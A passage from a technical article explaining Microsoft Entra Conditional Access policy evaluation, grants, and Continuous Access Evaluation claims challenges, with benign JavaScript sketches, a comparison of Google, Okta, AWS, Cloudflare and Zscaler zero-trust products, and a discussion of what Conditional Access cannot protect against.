There is one more wrinkle. The detection taxonomy on the Microsoft Learn concept page and the riskEventType enum on the Graph schema are not perfectly aligned. The concept page lists mcasImpossibleTravel and authenticatorPhishing as named detection types; the Graph enum lists impossibleTravel (without the mcas prefix). The two surfaces sometimes use different value names for the same logical detection -- a UI display string versus a Graph enum value. Detection engineers writing KQL against the Sign-in logs should account for both.
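One way to account for both names is a small alias table applied before any comparison. The sketch below is written in JavaScript for consistency with the other examples rather than KQL, and the table holds only the one pair named above; any further aliases would need to be confirmed against the two pages.

```javascript
// Alias table: alternate name -> canonical name. Only the pair discussed in
// the text is listed; extend it after checking the documentation.
const DETECTION_ALIASES = new Map([['mcasImpossibleTravel', 'impossibleTravel']]);

// Map a detection name to its canonical form, leaving unknown names untouched.
function canonicalDetection(name) {
  return DETECTION_ALIASES.get(name) || name;
}

// Compare two detection names after normalisation.
function sameDetection(a, b) {
  return canonicalDetection(a) === canonicalDetection(b);
}

console.log(sameDetection('mcasImpossibleTravel', 'impossibleTravel'));
console.log(sameDetection('leakedCredentials', 'impossibleTravel'));
```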

6.3 How CA consumes risk

Conditional Access evaluation runs in a fixed order: assignments are checked first (does this sign-in match this policy at all?), then conditions (do all the condition predicates hold?), then grants (which controls are demanded?), then session controls (which token lifetime, sign-in frequency, persistent browser).

The key semantic, repeated across the Microsoft Learn documentation: a block grant in any policy matching the sign-in overrides any allow grant in any other policy. The policy plane is not just additive; it has an explicit precedence rule.

flowchart TD
    A[Sign-in request] --> B[First-factor auth]
    B --> C[Enumerate matching policies]
    C --> D{Any policy matches?}
    D -- No --> E[Default allow with token]
    D -- Yes --> F[Evaluate conditions per policy]
    F --> G{Block grant in any match?}
    G -- Yes --> H[Deny access return error]
    G -- No --> I[Aggregate required grants]
    I --> J{All grants satisfied?}
    J -- No --> K[Issue challenge MFA or device]
    J -- Yes --> L[Apply session controls]
    L --> M[Issue access token]

The pseudocode below is a compressed restatement of that flow. It is not Microsoft source code; it is the algorithmic shape an admin should keep in their head when reading a policy or debugging a sign-in.

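{`
// Illustrative stand-ins so the sketch runs on its own. A real tenant's policy
// list and matching rules are far richer than these.
const allPolicies = [{
  displayName: 'Require MFA for Exchange Online',
  state: 'enabled',
  conditions: { users: ['alice@contoso.com'], apps: ['Office365 Exchange Online'] },
  grantControls: { builtInControls: ['mfa'] },
  sessionControls: { signInFrequencyHours: 8 },
}];
const matchesAssignments = (c, s) => c.users.includes(s.user) && c.apps.includes(s.app);
const matchesConditions = (c, s) =>
  !c.signInRiskLevels?.length || c.signInRiskLevels.includes(s.signInRisk);
const mergeSessionControls = (controls) => Object.assign({}, ...controls);

function evaluate(signin) {
  // Only enforced policies decide; report-only policies are logged, not applied.
  const matching = allPolicies.filter(p =>
    p.state === 'enabled' &&
    matchesAssignments(p.conditions, signin) &&
    matchesConditions(p.conditions, signin)
  );

  // Block precedence: any block grant wins
  if (matching.some(p => p.grantControls.builtInControls.includes('block'))) {
    return { decision: 'DENY', reason: 'block grant matched' };
  }

  // Aggregate required grants across matching policies
  const requiredGrants = new Set();
  for (const p of matching) {
    for (const g of p.grantControls.builtInControls) requiredGrants.add(g);
    if (p.grantControls.authenticationStrength) {
      requiredGrants.add('authStrength:' + p.grantControls.authenticationStrength.id);
    }
  }

  // Anything the sign-in has not yet satisfied becomes a challenge
  const missing = [...requiredGrants].filter(g => !signin.satisfies(g));
  if (missing.length > 0) {
    return { decision: 'CHALLENGE', missing };
  }

  // Apply session controls (token lifetime, sign-in frequency, persistent browser)
  const session = mergeSessionControls(matching.map(p => p.sessionControls));
  return { decision: 'ALLOW', session };
}

const result = evaluate({
  user: 'alice@contoso.com',
  app: 'Office365 Exchange Online',
  location: { ip: '203.0.113.42', country: 'PT' },
  device: { compliant: true, joinType: 'Entra' },
  signInRisk: 'low',
  userRisk: 'none',
  satisfies(grant) {
    const mfa = ['mfa', 'authStrength:phishingResistantMfa'];
    return mfa.includes(grant) || grant === 'compliantDevice';
  },
});
console.log(JSON.stringify(result, null, 2));
`}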

Risk-based conditions require Entra ID P2 [@ms-id-protection-overview]. Without that licence, the signInRiskLevels and userRiskLevels arrays in a policy are ignored. The rest of the engine works the same.

6.4 The grants

Each policy declares a set of grants. Within a policy, the grants combine under the policy's operator: AND requires all of them, OR requires any one. Across policies, every matching policy must be satisfied, and a block grant in any matching policy takes precedence over allow grants in any other policy. Here are the grants currently in the schema:

Grant	What it requires	Notes
`block`	Deny access.	Always wins against allow grants.
`mfa`	Any MFA method registered for the user.	The legacy generic-MFA grant; replaced in modern deployments by Authentication Strength.
`requireAuthenticationStrength`	A named bundle of acceptable methods.	The modern grant. Built-in strengths include phishing-resistant [@ms-auth-strengths].
`compliantDevice`	The device record has `isCompliant: true`.	Set by Intune or a third-party compliance partner.
`domainJoinedDevice`	Hybrid Azure AD joined device.	Requires Entra Connect on-prem trust.
`approvedApplication`	Use an approved client app.	A small allow-list of Microsoft mobile apps.
`compliantApplication`	An app under an Intune App Protection Policy.	Mobile app management.
`passwordChange`	User must change their password.	Used for password-leaked recovery.
`requireTermsOfUse`	User must accept a terms-of-use document.	Used for compliance and guest scenarios.

Authentication Strength. A named, ordered bundle of acceptable authentication methods that a CA grant can demand. The three built-in strengths are *MFA strength* (any registered second factor), *Passwordless MFA strength* (no password used), and *Phishing-resistant MFA strength* (FIDO2 security key, Windows Hello for Business or a platform credential, or multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the canonical modern grant for high-value access.

The Authentication Strength grant is where the phishing-resistance story lives in 2026. A policy that demands the phishing-resistant strength refuses to accept TOTP or SMS or push as the second factor. Only credentials with cryptographic binding to the device or hardware token will satisfy the grant. That class of credential, by construction, cannot be replayed by an adversary-in-the-middle phishing kit -- because the underlying WebAuthn ceremony is bound to the origin of the relying party.
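A minimal sketch of the check an Authentication Strength grant implies. The method identifiers are illustrative labels rather than the schema's real values, the real strengths are defined over method combinations, and the Passwordless tier is left out to keep the example small.

```javascript
// Illustrative subset of two built-in strengths. Identifiers are made-up
// labels for the methods named in the text, not Graph schema values.
const PHISHING_RESISTANT = ['fido2', 'windowsHelloForBusiness', 'multifactorCertificate'];
const STRENGTHS = {
  mfa: [...PHISHING_RESISTANT, 'push', 'totp', 'sms'],
  phishingResistant: PHISHING_RESISTANT,
};

// True when the method the user actually completed satisfies the demanded strength.
function satisfiesStrength(strengthName, methodUsed) {
  const allowed = STRENGTHS[strengthName];
  if (!allowed) throw new Error('unknown strength: ' + strengthName);
  return allowed.includes(methodUsed);
}

console.log(satisfiesStrength('mfa', 'totp'));
console.log(satisfiesStrength('phishingResistant', 'totp'));
console.log(satisfiesStrength('phishingResistant', 'fido2'));
```

The phishing-resistant list is a strict subset of the generic MFA list, so tightening a policy from one strength to the other only ever removes accepted methods.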

6.5 The Windows-side handoff

PRT issuance is an interactive sign-in. It goes through CA like any other.

Primary Refresh Token (PRT). A long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-Entra-joined devices. The PRT is bound to the device's TPM where one is available, and it grants the user single sign-on to all CA-targeted apps from that Windows session. Issuance is subject to CA evaluation; if a CA policy demands compliant device, the device must already be marked `isCompliant` before the PRT is issued.

The compliance state lands on the device object as isCompliant. Intune (or a third-party MDM through Intune's compliance-partner API) writes that field after evaluating the device against a compliance policy: disk encrypted, OS patched, antivirus running, jailbreak detection clean, and so on. CA reads it on subsequent policy evaluations. If a policy requires compliantDevice and the device object says isCompliant: false, the grant is not satisfied.

The operational seam to on-prem Active Directory runs the other direction. Kerberos and NTLM against on-prem domain controllers never consult Entra. The Microsoft Learn CA overview is explicit: CA is a cloud control plane; on-prem authentication is outside its scope [@ms-ca-overview]. This is the limit Section 8 will name precisely.

6.6 CAE in session

The third plane. The wire format is documented on two Microsoft Learn pages: the claims-challenge page [@ms-claims-challenge] and the app-resilience CAE page [@ms-app-resilience-cae].

A client opts in to CAE by advertising the cp1 capability via the xms_cc claim in token requests. In MSAL, that opt-in looks like WithClientCapabilities(new[] { "cp1" }) [@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page says it cleanly: "The only currently known value is cp1" [@ms-claims-challenge].

When the policy plane sees a critical event after the token was issued, the resource API responds to the next call with HTTP 401 Unauthorized and a WWW-Authenticate header of the shape:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer authorization_uri="<entra-authorize-endpoint>", error="insufficient_claims", claims="<base64-encoded JSON>"

The claims value is a base64-encoded JSON object that the client passes verbatim to the token endpoint when acquiring a fresh token [@ms-claims-challenge][@ms-app-resilience-cae]. The IdP evaluates the embedded claims, runs CA again with the new context, and issues a new token (or refuses).
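The client-side half of that exchange comes down to one parsing step. The sketch below runs on Node.js (it uses `Buffer`; a browser would use `atob`), the function name is hypothetical, and the claims payload is an invented example rather than a captured challenge.

```javascript
// Extract and decode the claims blob from a WWW-Authenticate header.
// Returns null when the header is not an insufficient_claims challenge.
function parseClaimsChallenge(wwwAuthenticate) {
  if (!/error="insufficient_claims"/.test(wwwAuthenticate)) return null;
  const match = /claims="([^"]+)"/.exec(wwwAuthenticate);
  if (!match) return null;
  const json = Buffer.from(match[1], 'base64').toString('utf8');
  return { raw: json, parsed: JSON.parse(json) };
}

// Invented payload, encoded at run time so the sample header is self-consistent.
const sampleClaims = JSON.stringify({
  access_token: { nbf: { essential: true, value: '1604106651' } },
});
const sampleHeader =
  'Bearer authorization_uri="<entra-authorize-endpoint>", ' +
  'error="insufficient_claims", ' +
  'claims="' + Buffer.from(sampleClaims, 'utf8').toString('base64') + '"';

const challenge = parseClaimsChallenge(sampleHeader);
console.log(challenge.raw);
```

The `raw` string is what the client hands back on the next token request; the parsed form is only useful for logging and debugging.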

Claims challenge. The HTTP wire format CAE uses to revoke a session mid-flight. A CAE-aware resource API returns `HTTP 401` with `WWW-Authenticate: Bearer error="insufficient_claims", claims="<base64-encoded JSON>"`. The client replays the base64 blob to Entra; Entra re-runs CA with the new context; the client receives a fresh token or a definitive refusal. The wire format is documented at [@ms-claims-challenge] and demonstrated at [@ms-app-resilience-cae].

Note: The CAE-aware capability is signalled by the client, not by the token. The client advertises cp1 via xms_cc; the token's CAE-awareness shows up as its lifetime (up to 28 hours) and the resource API's willingness to issue a claims challenge. Folk knowledge that says "look for a cae claim in the JWT" is incorrect.

The Microsoft Learn CAE document enumerates five critical events: account disabled or deleted, password change or reset, MFA enabled by an administrator, administrator token revocation, and high user risk detected by ID Protection [@ms-cae-concept]. A parallel pathway, Conditional Access policy evaluation, propagates network-location and policy changes to CAE-aware resource providers on the same channel. For IP-location changes the latency is "instant"; for everything else the ceiling is up to 15 minutes [@ms-cae-concept].
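Those bounds fit in a lookup. In this sketch the event names are hypothetical labels for the items listed above, "instant" is modelled as zero minutes, and anything outside the list is treated as waiting for ordinary token expiry.

```javascript
// Hypothetical labels for the five critical events named in the text.
const CRITICAL_EVENTS = [
  'accountDisabledOrDeleted',
  'passwordChangeOrReset',
  'mfaEnabledByAdmin',
  'adminTokenRevocation',
  'highUserRisk',
];

// Upper bound, in minutes, before a CAE-aware resource acts on an event.
// Returns null when the event is not propagated by CAE at all.
function revocationCeilingMinutes(eventName) {
  if (eventName === 'ipLocationChange') return 0; // documented as "instant"
  if (CRITICAL_EVENTS.includes(eventName)) return 15; // documented as "up to 15 minutes"
  return null;
}

console.log(revocationCeilingMinutes('highUserRisk'));
console.log(revocationCeilingMinutes('ipLocationChange'));
console.log(revocationCeilingMinutes('groupMembershipChanged'));
```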

sequenceDiagram
    participant C as Client app
    participant R as Resource API CAE aware
    participant E as Entra token issuer
    participant P as ID Protection
    Note over C: Client holds long-lived CAE token
    C->>R: GET messages with bearer token
    R->>R: Token still cryptographically valid
    P->>E: High user risk event for Alice
    E->>R: Push critical event Alice high risk
    C->>R: GET messages with bearer token again
    R->>C: 401 WWW-Authenticate insufficient_claims claims base64
    C->>E: Token request with claims blob and cp1 capability
    E->>E: Re-run CA with new context
    E-->>C: New token or definitive refusal
    C->>R: Retry with new token

// Simplified MSAL.js-shaped pseudocode for CAE opt-in and challenge handling
const ENTRA_AUTHORITY = '';
const EXCHANGE_ENDPOINT = '';
const MAIL_READ_SCOPE = '';

const msal = new PublicClientApplication({
  auth: {
    clientId: '',
    authority: ENTRA_AUTHORITY,
    clientCapabilities: ['cp1'], // advertise CAE awareness (MSAL.js reads this from the auth config)
  },
});

async function callExchange() {
  let token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE] });

  let res = await fetch(EXCHANGE_ENDPOINT, {
    headers: { Authorization: 'Bearer ' + token.accessToken },
  });

  if (res.status === 401) {
    const header = res.headers.get('WWW-Authenticate') || '';
    const m = /claims="([^"]+)"/.exec(header);
    if (m) {
      // Replay the embedded claims to acquire a fresh token
      token = await msal.acquireTokenSilent({
        scopes: [MAIL_READ_SCOPE],
        claims: atob(m[1]), // decode the base64 blob back to its JSON string
      });
      res = await fetch(EXCHANGE_ENDPOINT, {
        headers: { Authorization: 'Bearer ' + token.accessToken },
      });
    }
  }

  console.log('HTTP', res.status);
}

callExchange();

Key idea: CAE inverts the conventional trade-off: lengthen the token, shorten the revocation. The token can live 28 hours because revocation is an event, not a clock.

The chain is now visible. The signal plane scored Alice's Tuesday sign-in. The policy plane evaluated the policies. The token issuer issued an access token (CAE-aware because Outlook advertises cp1). Exchange Online accepted the token and returned mail. If, twelve minutes from now, Alice's account is flagged high risk because a different sign-in attempt fires leakedCredentials, the critical event will fire, Exchange will issue a claims challenge, and Outlook will either acquire a fresh token (passing the new CA evaluation) or surface the refusal to the user.

Six independent components co-decided on one access event. Microsoft is one vendor. The same problem has been solved differently by Google, Okta, AWS, Cloudflare, and Zscaler. The Microsoft answer is not the only correct answer.

7. How others do it

Microsoft chose to enforce at token issuance and claims challenge. Google chose to enforce at every HTTP request via a reverse proxy. AWS chose a decidable policy DSL. These are not minor variations; they are different answers to "where does the policy engine live in the data path?"

Both Microsoft's and Google's models scale. Neither is strictly better. The choice is a function of what the enterprise already runs.

Google BeyondCorp, IAP, Chrome Enterprise Premium

Google's Identity-Aware Proxy puts the policy engine in the data path. The documentation calls it bluntly: "IAP lets you establish a central authorization layer for applications accessed by HTTPS, so you can use an application-level access control model instead of relying on network-level firewalls" [@google-iap]. Every HTTP request to an IAP-protected app passes through the proxy. The proxy authenticates the user (via Google Account, Workforce Identity Federation, or Identity Platform), evaluates a Common Expression Language policy against the request context, and -- on allow -- forwards the request to the backend with signed identity headers.

The BeyondCorp Enterprise product (recently rebranded as Chrome Enterprise Premium) layers context-aware access on top: device posture, geographic location, time of day [@google-bce-overview]. The architecture matches the 2014 USENIX paper [@ward-beyer-2014-beyondcorp] and the 2016 production follow-up [@osborn-2016-beyondcorp].

The strength is per-request authorization: every HTTP call is its own decision point. The weakness, from the M365 perspective, is that IAP does not gate Microsoft 365 first-party API traffic. The Outlook client does not route through Google's IAP; it routes through Entra and Exchange Online. For Microsoft 365 workloads, IAP is complementary at best.

Okta Identity Engine and ThreatInsight

Okta's policy engine is closer to Microsoft's structurally: the identity provider is the policy engine, app sign-on policies live on the IdP, and the resource side relies on the IdP's token rather than a per-request proxy. The Okta Identity Engine documents the rule shape: "App sign-in policies define how a user must authenticate to gain access to an app. They verify ... group membership, the IP zone they're signing in from, risk level, and others" [@okta-sign-on-policies]. Every new app gets a default policy with a single catch-all rule that allows access with two factors.

Okta ThreatInsight is the IP-reputation feed. The documentation describes it operationally: "Okta ThreatInsight aggregates data about sign-in activity across the Okta customer base to analyze and detect potentially malicious IP addresses ... password spraying, credential stuffing, brute-force cryptographic attacks" [@okta-threatinsight]. The signal coverage is narrower than ID Protection: ThreatInsight is IP-centric, where ID Protection runs a multi-detection ML pipeline on tokens, sessions, behaviour, and credentials.

AWS IAM Identity Center and Verified Access

AWS splits the problem. IAM Identity Center handles workforce SSO and trusted identity propagation to AWS services [@aws-iam-identity-center]. AWS Verified Access handles per-request authorization for HTTPS-fronted apps -- the ZTNA piece. The Verified Access docs put it plainly: "Verified Access evaluates each application access request in real time" and "verifies the trustworthiness of users and devices against a set of security requirements" [@aws-verified-access].

The interesting bit is the policy language: Cedar. Cedar is a deliberately decidable language for authorization policy. "Decidable" here is a precise term: the safety question (will some policy edit, in some future edit chain, leak this right?) is answerable by a static analyser for any Cedar policy [@cedar-security].

Cedar's intentional non-Turing-completeness is the language-design hedge against the Harrison-Ruzzo-Ullman undecidability result the next section will name. The trade-off is expressiveness: Cedar cannot express arbitrary computational predicates, which is the price of being analysable [@cedar-security].

Cloudflare Access and Zscaler Private Access

Cloudflare Access is an edge proxy. Policies are deny-by-default, with four building blocks: Actions (Allow, Block, Bypass, Service Auth), Rule types (Include, Require, Exclude), Selectors, and Values [@cloudflare-access-policies]. The deny-by-default semantics are explicit: "Since Access is deny by default, users who do not match a Block policy will still be denied access unless they explicitly match an Allow policy" [@cloudflare-access-policies]. Cloudflare also ships a policy tester that lets administrators dry-run a policy against the existing user population [@cloudflare-access-policy-mgmt].
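
The interaction between the rule types and deny-by-default is easier to see in a toy evaluator. The sketch below is not Cloudflare's implementation: the selector names (`emailDomain`, `country`), the policy object shape, and the first-match ordering are assumptions chosen for illustration, and the Bypass and Service Auth actions are left out. It assumes Include behaves as OR, Require as AND, and Exclude as NOT.

```javascript
// Toy model of the Include / Require / Exclude rule types. Selector names
// and the first-match ordering are assumptions, not Cloudflare's code.
const selectors = {
  emailDomain: (user, value) => user.email.endsWith('@' + value),
  country: (user, value) => user.country === value,
};

const matches = (user, rule) => selectors[rule.selector](user, rule.value);

function policyApplies(user, policy) {
  const included = (policy.include || []).some((r) => matches(user, r)); // OR
  const required = (policy.require || []).every((r) => matches(user, r)); // AND
  const excluded = (policy.exclude || []).some((r) => matches(user, r)); // NOT
  return included && required && !excluded;
}

function evaluate(user, policies) {
  for (const policy of policies) {
    if (policyApplies(user, policy)) return policy.action; // 'allow' or 'block'
  }
  return 'deny'; // deny by default: no policy matched
}

const policies = [
  { action: 'block', include: [{ selector: 'country', value: 'XX' }] },
  {
    action: 'allow',
    include: [{ selector: 'emailDomain', value: 'example.com' }],
    require: [{ selector: 'country', value: 'DE' }],
  },
];

console.log(evaluate({ email: 'alice@example.com', country: 'DE' }, policies));
console.log(evaluate({ email: 'bob@other.test', country: 'DE' }, policies));
```

The second call is the case the quoted sentence describes: the user matches no Block policy, but is still denied because no Allow policy matches either.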

Zscaler Private Access is a broker-based ZTNA: the user connects to a Zscaler edge node, the broker establishes a connection to the private app, and "users never access the corporate network, and apps are never exposed to the public internet" [@zscaler-zpa]. Zscaler's own marketing surveys put the VPN-replacement framing in numbers: "91% of organizations are concerned that VPNs compromise their security" and "56% of organizations suffered one or more VPN-related attacks in 2023-2024" [@zscaler-zpa].

Architecturally, Cloudflare Access and ZPA both sit closer to BeyondCorp than to Microsoft CA: the policy engine is in the data path; the protected resource is fronted by the proxy rather than gated at token issuance.

OpenID Shared Signals Framework and CAEP

Not a competitor: the cross-vendor wire format for what Microsoft built into CAE. On 22 September 2025, the OpenID Foundation approved three Final Specifications: the Shared Signals Framework 1.0, the Continuous Access Evaluation Profile 1.0, and the Risk Incident Sharing and Coordination Profile 1.0 [@helpnet-2025-openid][@openid-caep-final]. CAEP defines five event types -- Session Revoked, Token Claims Change, Credential Change, Assurance Level Change, Device Compliance Change -- as the cross-vendor revocation vocabulary.

Microsoft's CAE implementation is, in Microsoft's own words, "an industry standard based on Open ID Continuous Access Evaluation Profile" [@ms-cae-concept]. The Final Specifications from September 2025 are the canonical post-2025 reference; older drafts at OpenID's site are superseded.
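
A receiver's job, once it has verified an incoming Security Event Token, is to map each event type to a local action. The sketch below shows that dispatch step only. The event-type URIs follow the CAEP naming pattern and should be confirmed against the Final Specification; the action names and the sample payload are hypothetical, and signature verification is deliberately out of scope.

```javascript
// Event-type URIs follow the CAEP naming pattern; treat them as assumptions
// and confirm against the Final Specification before relying on them.
const CAEP_PREFIX = 'https://schemas.openid.net/secevent/caep/event-type/';

// Hypothetical local actions for the five event types named above.
const CAEP_ACTIONS = new Map([
  ['session-revoked', 'terminate-session'],
  ['token-claims-change', 'refresh-claims'],
  ['credential-change', 'reauthenticate'],
  ['assurance-level-change', 'reevaluate-policy'],
  ['device-compliance-change', 'reevaluate-policy'],
]);

// Takes the already-verified payload of a Security Event Token and returns
// the local actions a receiver might queue.
function planActions(setPayload) {
  const actions = [];
  for (const eventType of Object.keys(setPayload.events || {})) {
    if (!eventType.startsWith(CAEP_PREFIX)) continue; // not a CAEP event
    const name = eventType.slice(CAEP_PREFIX.length);
    actions.push(CAEP_ACTIONS.get(name) || 'log-unknown-event');
  }
  return actions;
}

// Illustrative payload; issuer and timestamp are made up.
const sampleSet = {
  iss: 'https://idp.example.com',
  events: {
    [CAEP_PREFIX + 'session-revoked']: { event_timestamp: 1700000000 },
  },
};

console.log(planActions(sampleSet));
```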

Head-to-head comparison

The differences worth memorising:

System	Enforcement point	Native risk feed	Post-issuance revocation	Gates M365 first-party?	Best suited for
Microsoft Entra CA + ID Protection + CAE	Token issuer + CAE-aware resource APIs	ID Protection ML pipeline	CAE up to 15 min, instant for IP	Yes	M365 tenants
Google IAP / Chrome Enterprise Premium	HTTPS reverse proxy	Context-aware access signals	Per-request (always re-decides)	No	Google Cloud workloads
Okta Identity Engine + ThreatInsight	IdP token issuance	ThreatInsight IP feed	Limited, IdP-dependent	No	Vendor-neutral front door
AWS IAM Identity Center + Verified Access	Verified Access proxy + IAM	Trust providers (third-party)	Per-request for Verified Access	No	AWS-hosted apps
Cloudflare Access	Edge proxy	Risk score + identity factors	Per-request	No	Public web apps
Zscaler Private Access	Broker / edge node	Posture + identity	Per-request	No	Private app access

Per-cell sourcing for the table: the Microsoft row's "Yes" cell on M365 first-party gating is the directly-stated claim from the Microsoft Learn CA overview [@ms-ca-overview]. The other rows' "No" cells are negative inferences drawn from each peer's own product documentation, none of which advertises Microsoft 365 first-party API gating: Google IAP gates HTTPS-fronted apps behind the proxy [@google-iap]; Cloudflare Access deny-by-default applies to the apps fronted by Cloudflare [@cloudflare-access-policies]; Verified Access "evaluates each application access request" for HTTPS apps behind AWS [@aws-verified-access]; Zscaler ZPA brokers private app access [@zscaler-zpa]; Okta sign-on policies gate apps wired into Okta's IdP [@okta-sign-on-policies]. The cell semantics are "does the system gate Outlook/Teams/SharePoint/Graph first-party traffic" and the answer is structurally No outside Microsoft.

flowchart LR
    subgraph TOK[Token issuance model Microsoft Okta]
        U1[User] --> AT[Acquire token]
        AT --> CA1[CA evaluator]
        CA1 --> IS[Issue token]
        IS --> R1[Resource API validates token]
        R1 -. CAE 401 .-> AT
    end
    subgraph PRX[Data path proxy model Google BeyondCorp AWS Verified Access Cloudflare Zscaler]
        U2[User] --> PXY[Proxy intercepts every request]
        PXY --> POL[Policy evaluator at the proxy]
        POL --> BCK[Backend application]
    end

The honest observation worth sitting with: none of the proxy systems gates M365 first-party API traffic. Outlook, Teams, SharePoint, and Microsoft Graph route through Entra. For those workloads, Entra remains the only effective policy plane. The proxy systems gate the apps that sit behind the proxy -- internal apps, partner-facing apps, custom workloads. That makes BeyondCorp, Okta, Cloudflare Access, and ZPA complementary to Entra CA in an M365 environment, not substitutes for it.

Six systems, six architectural choices. None of them wrong. But what do they all leave on the table?

8. What Conditional Access fundamentally cannot do

Section 7 cannot be the ending. There are at least five things Conditional Access -- and every peer in Section 7 -- cannot do. Some are engineering limits; some are theorems. Both classes are worth naming.

(a) On-prem authentication

CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra. There is no policy hook for the legacy Windows protocols. If a domain user signs in to a domain-joined workstation, authenticates to a file server, and accesses a share, no piece of that flow touches Conditional Access. The Microsoft Learn overview is explicit about the scope [@ms-ca-overview].

This is the operational seam between cloud identity and on-prem identity.

Note: Conditional Access does not gate Kerberos or NTLM against on-prem domain controllers. If your threat model includes lateral movement after credential theft on the on-prem side, CA is not your defence. Layer in Defender for Identity, on-prem MFA gateways, or a privileged-access workstation architecture instead.

(b) Post-issuance token theft

Once a refresh token is exfiltrated -- whether via an adversary-in-the-middle phishing kit like Evilginx [@ms-aitm-phishing-blog], an infostealer that scrapes the token cache, or a malicious browser extension -- the pre-issuance CA evaluation is bypassed. The attacker has a bearer token. They can present it to the resource API directly. CAE-aware resource providers can revoke mid-session on the published critical-event list, but the latency ceiling is "up to 15 minutes" for non-IP events [@ms-cae-concept]. In fifteen minutes a competent attacker has done plenty.

The mitigation is device-bound credentials: Primary Refresh Tokens bound to TPM hardware, FIDO2 with hardware attestation, certificate-based authentication with hardware-protected keys [@ms-prt-concept]. A bearer token bound to a TPM is not exfiltratable in the same way; the wrapped key material never leaves the device.

(c) Consent-grant phishing

CA evaluates authentication, not authorization grants that a user makes to a malicious OAuth app. A user who clicks "Allow" on a permissions-consent prompt for an attacker-controlled app has performed an OAuth authorization, not a sign-in. The malicious app now has the user's delegated permissions for whatever scopes were granted. CA was not invoked because CA gates the user's sign-ins; it does not inspect the user's OAuth grants. Microsoft Defender for Cloud Apps documents the attack class as "risky OAuth apps" and ships investigation and remediation tooling on a separate plane from CA [@ms-illicit-consent-grant].

Admin consent settings, app governance policies, and explicit allow-listing of acceptable publishers live on that different plane. The policy admin who deploys CA needs to deploy app governance separately.

(d) Risk evaluation is probabilistic

Identity Protection produces a score, not a proof. A "high" risk level is a confidence; it is not the assertion "this sign-in is definitely an attack." No vendor in the Section 7 survey publishes precision or recall numbers for its risk engine. The operating point -- the threshold that maps a continuous score to discrete buckets -- is a trade-off that the vendor calibrates and the customer does not see.

This is a structural lower bound on any ML-driven risk plane, not a Microsoft-specific failure. Any classifier has false positives and false negatives. A risk-aware CA policy that says "block at high risk" will, with non-zero probability, block a legitimate sign-in. A policy that says "require MFA at medium risk" will, with non-zero probability, let through a sophisticated attacker whose detections fall under the threshold.
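
The base-rate arithmetic behind that claim can be sketched in a few lines. Every number below is hypothetical, since no vendor publishes these rates; the function name and parameters are likewise illustrative. The point is only that a rare event plus a small false-positive rate yields more blocked legitimate sign-ins than blocked attacks.

```javascript
// All inputs are hypothetical; no vendor publishes these rates.
function blockAtHighRisk({ signIns, attackRate, truePositiveRate, falsePositiveRate }) {
  const attacks = signIns * attackRate;
  const legitimate = signIns - attacks;
  const blockedAttacks = attacks * truePositiveRate;
  const blockedLegitimate = legitimate * falsePositiveRate;
  return {
    blockedAttacks,
    blockedLegitimate,
    missedAttacks: attacks - blockedAttacks,
    // Share of blocked sign-ins that really were attacks (precision).
    precision: blockedAttacks / (blockedAttacks + blockedLegitimate),
  };
}

const outcome = blockAtHighRisk({
  signIns: 1000000,
  attackRate: 0.001, // 1 in 1,000 sign-ins is an attack (assumed)
  truePositiveRate: 0.9, // detector catches 90% of attacks (assumed)
  falsePositiveRate: 0.01, // and flags 1% of legitimate sign-ins (assumed)
});

console.log(outcome);
```

Under these assumed rates, roughly 900 attacks and 9,990 legitimate sign-ins are blocked, so only about 8 percent of blocks are true attacks, while 100 attacks still get through.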

(e) Workload-identity CA is constrained by design

Block-only grants. No managed identities. No group assignments. The full human grant taxonomy does not transfer because a service principal cannot perform an MFA challenge, cannot register a FIDO2 key, cannot accept a terms-of-use document. The Microsoft Learn page on workload-identity CA enumerates the constraints precisely [@ms-workload-identity-ca]. Section 9 will name this as an open problem; for now, treat it as a documented limit.

The theorems behind the limits

Some of these limits are engineering choices that could be different in a future product. Some are deeper.

Saltzer and Schroeder 1975 [@saltzer-schroeder-1975] give the upper bound on aspirations: complete mediation across every authentication and authorization decision within scope of mediation. The principle does not constrain what is in scope. It constrains what you must do for whatever you have decided is in scope. On-prem AD is out of scope for CA by Microsoft's product decision; complete mediation cannot fix that, because the principle is about consistency within the boundary, not about expanding the boundary.

Harrison-Ruzzo-Ullman 1976 -- usually shortened to HRU [@harrison-ruzzo-ullman-1976] -- gives the lower bound on static analysis. The safety question in the general access-matrix model is undecidable. In informal terms: there is no general algorithm that proves a Conditional Access policy edit cannot, under some future edit chain, leak a sensitive right. This is why every vendor in the survey relies on evaluation-time mediation (the engine decides at the moment of the request) rather than static-proof analysis (the engine certifies in advance that no edit can ever leak). Cedar's intentional restriction to a decidable fragment, in AWS Verified Access, is the counter-strategy: trade expressiveness for analysability.

The bearer-token revocation trade-off is informal but real: the worst-case revocation latency is bounded below by the token's natural lifetime, unless a side channel exists. CAE is that side channel. Its latency is bounded by the propagation time of the channel (up to 15 minutes for non-IP events, instant for IP). Shorten the channel further and you discover that the IdP-to-resource-API event delivery has its own infrastructure costs.
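
As a worked version of that bound, the sketch below computes the worst-case window in which a stolen token stays usable after the revoking event. The 28-hour lifetime and 15-minute ceiling come from the figures quoted above; the function name, its parameters, and the 60-minute token in the usage lines are illustrative assumptions.

```javascript
const MINUTES_PER_HOUR = 60;
// Figures from the text: CAE tokens live up to 28 hours; critical events
// propagate within up to 15 minutes, IP-location changes instantly.
const CAE_TOKEN_LIFETIME_MIN = 28 * MINUTES_PER_HOUR;
const CAE_EVENT_CEILING_MIN = 15;

// Worst-case minutes a stolen token stays usable after the revoking event.
function worstCaseExposure({ remainingLifetimeMin, caeAware, ipEvent = false }) {
  if (!caeAware) return remainingLifetimeMin; // only the clock revokes
  const channelLatency = ipEvent ? 0 : CAE_EVENT_CEILING_MIN; // side-channel latency
  return Math.min(remainingLifetimeMin, channelLatency);
}

// A hypothetical 60-minute token with no side channel, versus a fresh CAE token.
console.log(worstCaseExposure({ remainingLifetimeMin: 60, caeAware: false }));
console.log(worstCaseExposure({ remainingLifetimeMin: CAE_TOKEN_LIFETIME_MIN, caeAware: true }));
```

The longer-lived CAE token ends up with the shorter exposure window, which is the inversion the section describes.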

